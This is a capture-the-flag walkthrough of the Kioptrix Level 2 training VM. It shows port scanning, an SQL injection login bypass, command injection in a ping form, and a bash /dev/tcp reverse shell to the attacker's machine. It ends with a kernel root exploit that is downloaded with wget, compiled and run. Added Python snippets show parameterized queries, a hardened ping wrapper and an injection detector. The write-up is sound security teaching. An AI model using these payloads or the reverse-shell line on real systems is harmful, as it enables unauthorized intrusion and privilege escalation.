Kioptrix 2 VM can be downloaded here.
0. Get the VM's IP
root@kali:~# netdiscover -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
260 Captured ARP Req/Rep packets, from 4 hosts. Total size: 15600
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.67 c4:e9:84:10:d3:5e 255 15300 TP-LINK TECHNOLOGIES CO.,LTD.
...
1. Enumeration
1.1 TCP Ports enumeration
root@kali:~# nmap 192.168.1.67 -sV
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-15 00:30 EST
Nmap scan report for 192.168.1.67
Host is up (0.000049s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp open ipp CUPS 1.1
3306/tcp open mysql MySQL (unauthorized)
MAC Address: C4:E9:84:10:D3:5E (Tp-link Technologies)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.64 seconds
Hmm, some interesting services we see running on the machine. Most of these are pretty old. I did a quick search for existing exploits and didn’t find any. It’s still very possible that other vulnerabilities exist, yet I decided to check the web server running first.
Note: I didn't do a full TCP scan as it was taking way too long. Running it in the background after the initial scan might be useful.
2. Web server
2.1 Login form
[Login form: "Remote System Administration Login", with Username and Password fields]
Hitting http://192.168.1.67 shows us a login form, possibly vulnerable to SQL injection. I tried the vanilla admin' or 1=1 # and it worked!
Why did it work? Possibly because the query is in this form:
SELECT * from users where username="$_REQUEST["username"]" and password="$_REQUEST["password"]"
After submitting admin" or 1=1 # as the username, it's evaluated to:
SELECT * from users where username="admin" or 1=1 # and password="..." (everything after # is a comment and ignored)
The or 1=1 makes the WHERE clause true for every row and the # comments out the password check, so the first row (admin) comes back and we're logged in as admin. The quote character in the payload has to match the one the query wraps the value in; if the query uses single quotes, the same payload is admin' or 1=1 #.
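The bypass described above, as an added example that is not the VM's code: a login lookup built by pasting the fields into the SQL string beside the parameterized form. It uses an in-memory SQLite table with constructed rows; since SQLite quotes strings with single quotes and comments with -- rather than MySQL's #, the payload becomes admin' or 1=1 -- but the mechanism is the same.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the VM's users table (assumed schema: the page
    # only shows a "users" table with username and password columns).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'assumed-admin-pw')")
    db.execute("INSERT INTO users VALUES ('john', 'assumed-john-pw')")
    db.commit()
    return db


def login_vulnerable(db, username, password):
    # Same construction as the query guessed above: field values are pasted
    # straight into the SQL text, so a quote ends the literal, "or 1=1"
    # matches every row, and "--" comments out the password check.
    query = (f"SELECT username FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    # Placeholders hand the values to the driver as data: the quote and the
    # comment marker are just characters inside the username being compared.
    query = "SELECT username FROM users WHERE username=? AND password=?"
    row = db.execute(query, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or 1=1 --"
    print("vulnerable   :", login_vulnerable(db, payload, "anything"))
    print("parameterized:", login_parameterized(db, payload, "anything"))
```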
2.2 Admin interface
The admin interface offers a ping tool that takes an IP address and hands it to the system's ping command. This looks very vulnerable to command injection (giving remote code execution). Let's try appending commands to it.
- Input: 127.0.0.1
Output:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.010 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.012 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.012 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.010/0.011/0.012/0.003 ms, pipe 2
- Input: 127.0.0.1; whoami
Output:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.007 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.012 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.013 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.007/0.010/0.013/0.004 ms, pipe 2
apache
whoami returned apache! We're able to execute arbitrary commands as the web server user. Let's get a shell by starting a listener on the attacking machine.
root@kali:~# nc -nvlp 443
listening on [any] 443 ...
Then get a reverse shell connected to it by injecting:
Input: 127.0.0.1; bash -i >& /dev/tcp/192.168.1.69/443 0>&1
Output on attacking machine:
root@kali:~# nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.1.69] from (UNKNOWN) [192.168.1.67] 32769
bash: no job control in this shell
bash-3.00$
Awesome! We got a shell as apache user.
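The ping tool's flaw and its fix, as an added example that is not the VM's own code: the vulnerable shell-line construction beside a hardened version that only accepts a literal IP address and runs ping as an argv list without a shell, plus a small detection rule for the two injected inputs seen above. The ping flag values and the function names are assumptions.

```python
import ipaddress
import subprocess

SHELL_META = set(";|&`$()<>\n")


def ping_command_vulnerable(target):
    # Mirrors what the admin page's ping tool appears to do: the raw field
    # value is pasted into a shell command line, so anything after a ";"
    # (whoami, or the reverse-shell one-liner above) runs as the apache user.
    return f"ping -c 3 {target}"


def parse_target(target):
    # Returns the normalized address if the input is a literal IPv4/IPv6
    # address, else None. Hostnames are deliberately not accepted here.
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        return None


def ping_argv_hardened(target):
    # Hardened form (added example, not the VM's code): validate first, then
    # build an argv list executed without a shell, so metacharacters in the
    # field are never interpreted by anything.
    addr = parse_target(target)
    if addr is None:
        raise ValueError(f"rejected ping target: {target!r}")
    return ["ping", "-c", "3", addr]


def run_ping(target):
    # shell=False: the argv goes straight to execve, no command-line parsing.
    out = subprocess.run(ping_argv_hardened(target), capture_output=True,
                         text=True, timeout=15)
    return out.stdout


def is_injection_attempt(target):
    # Detection rule for form submissions or request logs: a value that is not
    # a bare address and carries shell metacharacters is worth alerting on.
    return parse_target(target) is None and any(c in SHELL_META for c in target)


if __name__ == "__main__":
    for value in ("127.0.0.1", "127.0.0.1; whoami",
                  "127.0.0.1; bash -i >& /dev/tcp/192.168.1.69/443 0>&1"):
        print(f"{value!r}: shell line -> {ping_command_vulnerable(value)!r}, "
              f"injection={is_injection_attempt(value)}")
```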
3. Getting root
Basic enumeration will reveal that this CentOS version (4.5 Final) is vulnerable to CVE-2009-2698.
The exploit can be found here.
root@kali:~# nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.1.69] from (UNKNOWN) [192.168.1.67] 32769
bash: no job control in this shell
bash-3.00$ cat /etc/issue
Welcome to Kioptrix Level 2 Penetration and Assessment Environment
--The object of this game:
|_Acquire "root" access to this machine.
There are many ways this can be done, try and find more then one way to
appreciate this exercise.
DISCLAIMER: Kioptrix is not resposible for any damage or instability
caused by running, installing or using this VM image.
Use at your own risk.
WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the outside world
(the Internet - or Interwebs..)
Good luck and have fun!
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ uname -mrs
Linux 2.6.9-55.EL i686
bash-3.00$ cat /etc/redhat-release
CentOS release 4.5 (Final)
bash-3.00$ cd /tmp
bash-3.00$ wget https://www.exploit-db.com/download/9542 --no-check-certificate
--23:08:44-- https://www.exploit-db.com/download/9542
=> `9542'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [application/txt]
0K .. 100% 210.21 MB/s
23:08:45 (210.21 MB/s) - `9542' saved [2645/2645]
bash-3.00$ ls
9542
index.html
bash-3.00$ mv 9542 a.c
bash-3.00$ gcc a.c
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00#
Quite easy and straightforward!